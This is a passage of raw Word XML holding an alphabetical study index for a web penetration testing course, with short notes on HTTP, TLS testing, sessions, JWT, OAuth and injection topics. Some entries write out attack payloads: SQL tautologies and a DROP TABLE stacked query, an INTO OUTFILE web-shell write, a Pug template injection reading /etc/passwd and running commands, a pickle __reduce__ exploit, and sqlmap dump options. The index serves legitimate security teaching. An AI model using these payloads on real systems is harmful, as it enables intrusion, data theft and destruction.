            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="1ABD88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DB01D5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– Referer header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B1.91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862A0B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Identifies where user came from (misspelled intentionally). GET params with sensitive data = Referer leak risk</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="2F683D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43973E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– TRACE method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B1.85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B21813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Designed for troubleshooting. NEVER in production. Enables Cross-Site Tracing (XST). Finding on any assessment</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="5B98CD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D10367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– User-Agent header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B1.90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206D7F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Identifies web client. Attack tools have distinctive UAs (sqlmap, Nikto). We are 'routinely abnormal'</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="3005AE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00E3B4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Request structure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B1.74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D05BBE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StartLine: METHOD URI HTTP/version. Headers (CRLF-delimited). Blank line. Body. Host=mandatory in HTTP/1.1</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="6FA5AB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5100FA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Response – first line = Status Code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B1.75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434FB9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HTTP/version STATUS Reason. Exam: Status Code is FIRST element of HTTP response. 200=OK, 401=Unauthorized, 403=Forbidden, 404=NotFound</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="36BBF6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41B4E63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Response – Server header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B1.98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3EFEF4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Reveals web server software+version. RESPONSE header. Fingerprinting target. phpinfo.php also reveals doc root, UID</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="3B41CE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3D92B1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Response – Set-Cookie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B1.98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D575AC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Server sets cookie: Set-Cookie: name=val; path=/; Secure; HttpOnly; SameSite=Strict. Check all attributes</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="49B01C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693085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Security Headers summary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B1.100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1B3617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X-Frame-Options (Clickjacking), HSTS (force HTTPS), CSP (script origins), X-Content-Type, Referrer-Policy</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="45D2B1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45391F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Versions: 1.0/1.1/2/3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B1.68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514461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HTTP/1.0=1996, GET/HEAD/POST. HTTP/1.1=1997, virtual hosts (Host header). HTTP/2=binary framing/multiplexing. HTTP/3=QUIC/UDP (~26.8% of sites 2023)</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="4BE2EA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EDD77D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HttpOnly Cookie – JS returns empty string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B1.95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14B2BF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JS cannot read HttpOnly cookie. document.cookie returns '' (empty). 'Only HTTP allowed to interface with cookie'</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="2D9153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B4AA0F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HTTPS / SSL/TLS overview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B1.140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90EF31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HTTP is cleartext. TLS adds: Confidentiality, Auth (certs), Integrity (hashing). Final SSL3=1996, TLS1.2=2008, TLS1.3=2018</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="79EAF5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B4CEA3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HTTPS Testing – Nmap ssl-enum-ciphers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B1.150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0C1E7E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nmap -p 443 --script=ssl-enum-ciphers host. Grades A-F. Exam: TLSv1.2 only=denies TLS1.1. least strength:C = weak ciphers (3DES/RC4) offered</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="7C0175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5C9619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HTTPS Testing – Qualys SSL Labs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B1.152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9B125B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ssllabs.com/ssltest. Free. No registration. Letter grade + full report. Protocol support, key exchange, cipher strength, cert chain</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="6AAFF21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EFC6E9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HTTPS Testing – testssl.sh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B1.151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52C972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By @drwetter. No OpenSSL dependency. Bash script or Docker. Categories: NULL, Anonymous, Export, Low, 3DES, Obsolete CBC. Most thorough</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="0C4EBB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7AE708E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I</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="46365C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38D2E5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Idempotent HTTP methods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B1.77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A36DFD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Repeated submission = same server state. GET, HEAD, PUT, DELETE are idempotent. POST is NOT idempotent</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="5B7195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E849E3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Information Leakage types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B2.24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0B6449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Valid usernames, DB type/version, DB schema, directory structure, OS/service versions. SQL error messages reveal DB type. WSTG-CONF-04</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="5D2DC7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F8B5C4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Insecure Deserialization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B5.35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06065C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Turning serialized bytes back into objects. Java most affected, also .NET, PHP, Ruby, Python. Modify serialized params. ysoserial tool for Java. OWASP A08:2021</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="31F43C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4040FBE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Insecure Deserialization – Java ysoserial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B5.47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80C7BC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ysoserial generates gadget chains for Java. RCE via deserialization. CommonsCollections, Spring, Hibernate chains</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="665D9B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1BD47F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Insecure Direct Object Reference (IDOR)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57E390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BOLA = IDOR for APIs. Change ?id=123→?id=124. Access other users' objects. WSTG-ATHZ-04</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="124290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01AE15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J</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="6932BE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EBAFBE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JavaScript Objects: window, document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65E42B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window=browser window. document=DOM document. document.cookie=read cookies. window.location=redirect. These enable XSS impact</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="412F63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ACE812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JavaScript Server-Side (Node.js)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B4.119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F3DCEB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Node.js=JS runtime outside browser. Express=popular framework. Template injection (SSTI) possible. Server-side JS = different attack surface</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="196AF4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207E68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JSON – structure and attacks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B4.123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422E2F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JSON = key-value data. Attacks: type juggling, injection via JSON params. JSON Web Tokens (JWT) = B2.99</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="162AAF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744F85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JWT – JSON Web Tokens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B2.99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BF7A2B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Header.Payload.Signature (Base64 each). Claims: iat=issued-at, iss=issuer, exp=expiry. Attack: alg=none, weak secret, kid injection</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="17DC33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E9064F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JWT – attacks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B2.101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47F047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alg:none bypass, brute-force weak secret, RS256→HS256 key confusion, kid injection, JKU/X5U manipulation. Lab W1.162</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="576702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75BC647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K</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="258662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5C55D1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Kiterunner – API endpoint discovery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B2.52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F91556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Discovers API routes using wordlists. Better than ffuf for API endpoints. kr scan http://target -w routes.kite</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="274033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2F6A976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L</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="05A7FE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4FEB5B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LFI – Local File Inclusion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B3.32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A8F471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Read local server files. ../etc/passwd. PHP filters. Log poisoning. Null byte (%00) bypass (older PHP). Lab W1.284</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="3800E1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8DB3B9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LFI via SSTI – RCE example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B4.134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2D8A919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Node.js Pug SSTI: #{global.process.mainModule.require('fs').readFileSync('/etc/passwd')}. RCE: .require('child_process').execSync('id')</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="103008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4D8689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Logic Flaws / Business Logic Flaws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D31F27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Context-dependent. Workflow tampering. Difficult to find+fix. WSTG-BUSL-01 through BUSL-09. Burp Repeater ideal for testing</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="149707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DD3B82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Logic Flaws – Workflow Tampering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E4B94C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Expected ordering of steps. Skip checkout→payment. Add item after pricing. Negative quantities. Burp Repeater to replay out-of-order</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="267615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010E8E4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M</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="41E4A5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B36419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Manual Inspections (WSTG technique)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B1.20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B7FD39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Interviews designers+system owners. Reviews documentation. No technology required. 'Interviewing designers'=Manual Inspections</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="114E3A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B9CC27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lastRenderedPageBreak/>
                    <w:t>Metasploit – Web App Testing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B5.81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7DD568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Framework for exploitation. auxiliary/scanner/http/* for web. post/multi/gather for enumeration. db_import for Nmap results. msfconsole</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="60A05D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134E96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Methodology – OWASP WSTG vs PTES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B1.21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5EA17C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WSTG: Info Gathering→Config→Identity→Auth→Authz→Session→Input Validation→Error→Crypto→Business→Client. PTES: Pre-engage→Gather→Threat Model→Vuln→Exploit→Post-exploit→Report</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="78DC9A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033A911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N</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="593DC2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22AE7C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nc (netcat) – port scanning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B1.127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30B07F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nc -vz host port. -v=verbose, -z=zero I/O. Output: 'Connection to host port [tcp/svc] succeeded'. For loop scan. Not purpose-built like Nmap</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="05ADD1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1523FE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Nmap – service version detection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B1.129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B6AA7A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nmap -sV target. NSE: --script=ssl-enum-ciphers, dns-brute, http-title, etc. Google specific versions for CVEs. Check ExploitDB</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="668B9D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8496D0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Nmap DNS NSE scripts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B1.115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3E8016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dns-zone-transfer.nse, dns-brute.nse (CNAMEs). ls /usr/share/nmap/scripts/dns*. dns-brute useful for subdomain enum</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="5A1728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532585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NoSQL Injection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B3.65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774777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MongoDB: {$where: '1==1'}, $gt, $ne operators. {'username':{$gt:''},'password':{$gt:''}}. Non-relational DB. Blind variants exist</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="528CE3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58633B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nslookup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B1.112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87BDAF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Near-universal (Windows/Linux/macOS). Limited vs dig. Useful for living-off-land on compromised hosts. Confirms blind command injection</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="67A5B5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1EDF8C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Nuclei – vulnerability scanner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B5.91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16CD7F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ProjectDiscovery. Written in Go. Template-based (YAML). CVE templates. -t=template/dir. -H=headers (auth). -iserver=interactsh. Open source</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="666999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5B36F53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O</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="1FF52F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C305DD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OAUTH2 – Authorization Code Flow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B2.90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68BE5A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Most secure. User→App→Auth Server→Code→App→Token. Redirect URI validation critical. State param=CSRF protection</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="4AF45E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C1BC0B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OAUTH2 – Implicit Flow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B2.92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FBD445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Token in URI fragment. Less secure. Access token exposed in browser history. Being deprecated</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="5736DE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BD58AE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OAUTH2 – Vulnerabilities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B2.96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A3D92D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Open redirect, state param not validated (CSRF), token leakage in referrer, scope manipulation</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="7BE4D2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F140DD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OIDC – OpenID Connect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B2.88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F6474E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Auth layer on top of OAuth2. ID token (JWT) contains user identity. Used by Google, Microsoft, Facebook</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="693DFF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4668ED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OWASP Top 10 – API (2023)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B1.27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D83180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API1:BOLA, API2:Broken Auth, API3:BOPLA, API4:Resource Consumption, API5:Function Level Auth, API6:Sensitive Data, API7:Security Misconfig, API8:Injection, API9:Improper Asset Mgmt, API10:Unsafe Consumption</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="4CBC59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A70E05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OWASP Top 10 – LLM (LLM01-LLM10)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B5.22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75A42A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LLM01:Prompt Injection (direct=jailbreak, indirect), LLM02:Insecure Output→XSS, LLM04:Model DoS, LLM06:Sensitive Disclosure, LLM07:Insecure Plugin→SSRF-like, LLM08:Excessive Agency→spear phishing</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="161627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0BA241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OWASP Top 10 – Web (2021)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B1.25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006F5F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A01:Broken Access Control, A02:Crypto Failures, A03:Injection, A04:Insecure Design, A05:Misconfig, A06:Outdated Components, A07:Auth+ID Failures, A08:Deserialize, A09:Logging Failures, A10:SSRF</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="544156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6AEE550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P</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="226A5E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9B1548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Password Spraying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B2.108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305D93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Use one password against many accounts. Avoids lockout. Combine with harvested usernames. SecLists has common passwords</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="2DC48B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5C7BAE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Pentest Report – Appendices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B5.122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A5A1AD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Extra details: many affected paths, enumerated users/passwords, auth letters, scope limitations, long command output, exfiltrated data</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="2E4324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82EBF4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Pentest Report – Executive Summary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B5.118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46C6A9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Business+financial impact. Max 1 page. High/critical findings. No FUD. Bullet points. Timeline+goals+results</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="60D10C46" w14:textId="77777777" w:rsidR="00985AE1" w:rsidRDefault="00985AE1"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
          </w:tcPr>
          <w:p w14:paraId="4ED0BF68" w14:textId="77777777" w:rsidR="00985AE1" w:rsidRDefault="00985AE1"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7500" w:type="dxa"/>
          </w:tcPr>
          <w:tbl>
            <w:tblPr>
              <w:tblW w:w="740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4800"/>
            </w:tblGrid>
            <w:tr w:rsidR="00985AE1" w14:paraId="2E1541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94BDAC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P</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="46D4EE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07864C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Pentest Report – Findings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B5.121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5BFB6C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Technical details: affected path+param, screenshots, command lines, severity levels, remediation steps, reproduce steps. Group by severity</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="4E8E14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1D73E8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Pentest Report – Test Parameters (=Introduction)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B5.120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985D6C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Project Objective, Scope (IPs/URLs), Schedule (dates), Targets, Limitations, Findings Summary, Remediation Summary. Exam: 'Test Parameters' = Introduction section of report</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="3128AA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BB0463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Pentest Pre-Engagement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B5.107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481C32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Permission (signed letter/SOW), Scope (IPs/URLs/exclusions), Rules of Engagement, Source IPs, Test accounts (2 per role), Backups</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="51B164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03308D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Postman – API testing tool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B4.139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0E5F9E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Import Swagger/OpenAPI collections. Issue HTTP requests. JS scripts. Seed to Burp for testing. Supports REST+SOAP</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="2EAB7A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D691FE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Prototype Pollution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B4.91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4F88FA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JS: __proto__ manipulation. Pollutes Object.prototype. All objects inherit polluted props. JSON merge/clone vuln. Affects all instances</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="177B6C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3842DA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Python – for web app testing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B5.63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0D8C7F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requests library: get/post/put/delete. requests.get(url, verify=False). POST data=dict. headers=dict. cookies=dict</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="2B5714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4ED001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Python – requests.get() attributes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B5.65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329881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response.status_code (int). response.headers (dict—server version). response.text (HTML string). response.content (bytes). NO .stderr</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="5A36B5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6BC4D8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Python – verify=False SSL bypass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B5.65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0F6E18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requests.get('https://target.com', verify=False). Bypasses SSL certificate errors. Required for self-signed/lab certs</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="19EA87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FD76E0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Python Pickling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B5.71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6A598F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Python's serialization. pickle.dumps()=serialize. pickle.loads()=deserialize. Deserializing untrusted data=RCE. __reduce__ method for exploit. Lab W2.178</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="7A3D2C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5670E9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Python Pickling – exploit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B5.76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DA8A7E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class Exploit(object):   def __reduce__(self):     return (os.system, ('id',)) pickle.dumps(Exploit())</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="7EEB72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17DFC73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R</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="769199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99A8EC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Reflected XSS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B4.49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963D93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Payload in URL/POST. Server reflects it back. Victim must click crafted link. Non-persistent. Exam: uniquely crafted probe string first</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="07730D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AAA7CA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Report Formats – alternatives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B5.123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97C7A7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Spreadsheet (in-house teams). Computer-readable XML/JSON (feed into vulnerability mgmt). Portals. Formal written report</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="3B7943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3E2AB5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REST – Web Services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B4.136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9D4958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URI=endpoint, Method=operation (GET/POST/PUT/DELETE), Payload=JSON usually. Stateless. Test all params. Seed to Burp</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="7DF99D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61499C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robots.txt – Robot Exclusion Protocol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B1.157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F5B55D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Lists paths spiders should ignore. Attackers USE these paths as entry points! robots.txt is PUBLIC. Never hide sensitive content here</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="48DB54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6C0CF9E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S</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="1678D9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14B66C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SAML – Security Assertion Markup Language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B2.75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4B1DD0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XML-based. Identity Provider (IdP)+Service Provider (SP). Assertions contain attributes. Signature bypass attacks</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="5C4F50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543283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SAST – Static Application Security Testing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C6AE7E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Analyzes source code. Full knowledge required. Tools not just manual review. Finds issues not visible in deployed app</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="055798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9D1FD9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SecLists – wordlist collection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B2.17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7F9CDC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Comprehensive wordlists. Common usernames, passwords, fuzzing payloads, discovery words. /usr/share/seclists/ in Kali</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="41E8E7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C738E6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Security Logging – OWASP A09:2021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B5.30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82B585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Absence allows breaches to go undetected avg 191 days. Required logging: auth failures, access control failures, server-side validation failures</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="5BB7A5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F0C010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Session – Confidential (via HTTPS)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B2.131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A8F6F9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Session IDs via HTTPS only. GET params logged→never pass session ID in URI. Cookies need Secure flag</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="064D6F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F6375E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Session – Expire on logout/timeout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B2.129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5AF6F4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Server-side session invalidation required. Test: reuse session ID after logout→should fail. Check logout+timeout both</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="59765CD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3BD763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Session – Fixation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B2.131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66D482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Attacker sets victim's session ID before login. After victim authenticates, attacker uses pre-set ID. Fix: regenerate session ID after login</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="5C3379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CD42EA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Session – Identifiers (where found)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B2.121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30F476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Cookies (most common). Hidden form fields (POST params). Custom headers. URI parameters. Common names: PHPSESSID, JSESSIONID, ASP.NET_SessionID</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="406DC3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DCB4AC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Session – Tamper Resistant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B2.128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B016AD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Session ID must change after authentication. Not set to role/username. High-security: validate Referer, User-Agent, source IP</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="512673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DDFD17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Session – Unpredictable attributes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B2.123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E73879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Algorithm quality. Length in bytes. Character space (A-Z,a-z,0-9,symbols). Burp Sequencer tests randomness</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="2A3C4B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4B2A74D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Session Analysis – Burp Sequencer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B2.126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6D1D09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Collect 10,000+ session tokens for reliable analysis. Analyzes entropy per bit. Identifies sequential or weak patterns</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="65DE20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62F503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Shodan – internet search engine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B1.125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024FBD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shodan.io. Finds: webcams, routers, IoT, industrial control. Passive recon (no packets to target). May find third-party managed systems</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="522179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5A00CF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Side-Channel Attacks / Timing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B2.112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81D2BA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Use physical attributes (time, EMI, heat). Timing: good user hashes password before error→SLOWER response. Username enumeration via timing</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="0254BD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940A05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SOAP – Web Services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B4.137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F53F11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XML messages. Extensible, neutral (TCP/UDP/HTTP/SMTP). Any programming model. WSDL describes service. Test in Postman/SoapUI then Burp</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="3EE660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801143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SoapUI – API testing tool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B4.141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C727B0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Supports SOAP+REST. Imports WSDL+Swagger. Windows/Linux/macOS. Seed to Burp for testing</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="082C6A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70741F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SOP – Same-Origin Policy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B4.22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C7B7B0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Restricts cross-origin DOM access. Origin=Protocol+Host+Port (all 3 must match). Cookies laxer than DOM. Prevents cross-tab data theft</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="5382D5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AEC734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SOP – Test cases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B4.25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C0E168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https://bank.test vs http://bank.test=diff protocol✗. vs bank.test:4343=diff port✗. vs evil.test=diff host✗. Cookies: no port/protocol check</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="0D6875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D5742E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 – Balancing queries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B3.60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7AEF13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Must balance quotes: ' or "— If input is in WHERE name='X', inject: ' OR '1'='1 (balance the single quote)</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="47C1AC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B63B04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 – Blind Boolean: binary search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B3.100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A6ECD2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Bisect character space. 1-26 chars: is char &gt; 'M'? Binary search takes log2(n) queries per char. SLEEP() for time-based</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="018141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C0E5D6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 – FROMless SELECT (Oracle issue)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B3.84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E22361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Oracle REQUIRES FROM: SELECT NULL FROM DUAL. All other DBs allow FROMless SELECT. Persistent UNION NULL failures = Oracle fingerprint</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="3AA2AC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6CA346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 – injection tautology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B3.59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648319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' OR '1'='1, ' OR 1=1--, ' or 'alpha'='alpha. Always-true condition. 'or John'=John also works. Bypasses WHERE clause</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="4CB9DE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DC1352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 – NULLs and UNION technique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B3.85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8219E1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UNION SELECT NULL,NULL,NULL-- until no error = column count found. Then replace NULL with string/int to find data types. FROMless on non-Oracle</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="72A128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18C27D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 – SELECT INTO OUTFILE (MySQL)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B3.113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8E0C98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SELECT 'shell' INTO OUTFILE '/var/www/html/shell.php'. Requires FILE privilege + write access to webroot. Creates web shell</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="276FB9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BA5114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lastRenderedPageBreak/>
                    <w:t>SQL – Stacked Queries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B3.73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694042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Multiple queries with semicolon: 1; DROP TABLE users;--. Enables INSERT/UPDATE/DROP beyond original query. Not all DBs support</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="0D8D75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43B070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 – UNION SELECT technique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B3.80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788FE3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Column count must match original query. Data types must be compatible. Use ORDER BY to find count first. String needed for exfil</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="35BB3F8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6D02AE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 – version fingerprint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B3.111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B097AD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SELECT @@version (MySQL/MSSQL). SELECT version() (PostgreSQL). SELECT banner FROM v$version (Oracle). db.runCommand({buildInfo:1}) (MongoDB)</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="58A355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B8231A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sqlmap – auth/sessions/proxies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B3.123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CB8CD2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-r=captured request. --cookie='SESSID=42'. --proxy=http://127.0.0.1:8080. Proxy session must be configured to transform requests</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="5534FF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D16740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sqlmap – data exfiltration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B3.131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16D9D3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--all (everything), --count (records only, no data), --dump (with -D -T), --dump-all, --search='user'. BE CAREFUL with sensitive data</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="352E76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D42631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sqlmap – DB enumeration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B3.130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6E1881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--schema --exclude-sysdbs. --dbs/--tables/--columns. -D customer --tables. --schema dumps ALL names. SQLite: --tables only</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
